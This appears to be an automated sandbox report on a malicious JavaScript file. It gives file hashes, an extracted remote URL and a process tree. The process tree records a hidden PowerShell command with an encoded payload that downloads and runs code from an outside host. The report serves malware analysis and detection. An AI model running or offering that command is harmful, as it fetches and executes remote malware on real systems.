Analysis
-
max time kernel
0s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 21:13
Static task
static1
Behavioral task
behavioral1
Sample
1c9d3b9d64acff774055d06887681886.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1c9d3b9d64acff774055d06887681886.js
Resource
win10v2004-20231215-en
General
-
Target
1c9d3b9d64acff774055d06887681886.js
-
Size
453KB
-
MD5
1c9d3b9d64acff774055d06887681886
-
SHA1
94b3738b90d3ecb6c84c33e2b093854aa831d74a
-
SHA256
4ce07b8b02edff4408935b2d17158a2e8a65937eaf300f66cd7d8ba93701209d
-
SHA512
4325dd444e9c84e86c6e7fa8fe2134d091feee28ae01da7d886967b48ac55502147df22378fcdb5e97a97936b4560858cc7de35e91c06523e4f7629e7a23883d
-
SSDEEP
12288:2kpu3BdD+cHjQnKBam64qzVnvAICJOlowollpE7EixMmlVR:DWIJjofpE7EOzVR
Malware Config
Extracted
http://grupotopbem.com.br/ashkere.php
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1c9d3b9d64acff774055d06887681886.js1⤵PID:3664
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZwByAHUAcABvAHQAbwBwAGIAZQBtAC4AYwBvAG0ALgBiAHIALwBhAHMAaABrAGUAcgBlAC4AcABoAHAAIgApAA==2⤵PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZwByAHUAcABvAHQAbwBwAGIAZQBtAC4AYwBvAG0ALgBiAHIALwBhAHMAaABrAGUAcgBlAC4AcABoAHAAIgApAA==1⤵PID:3748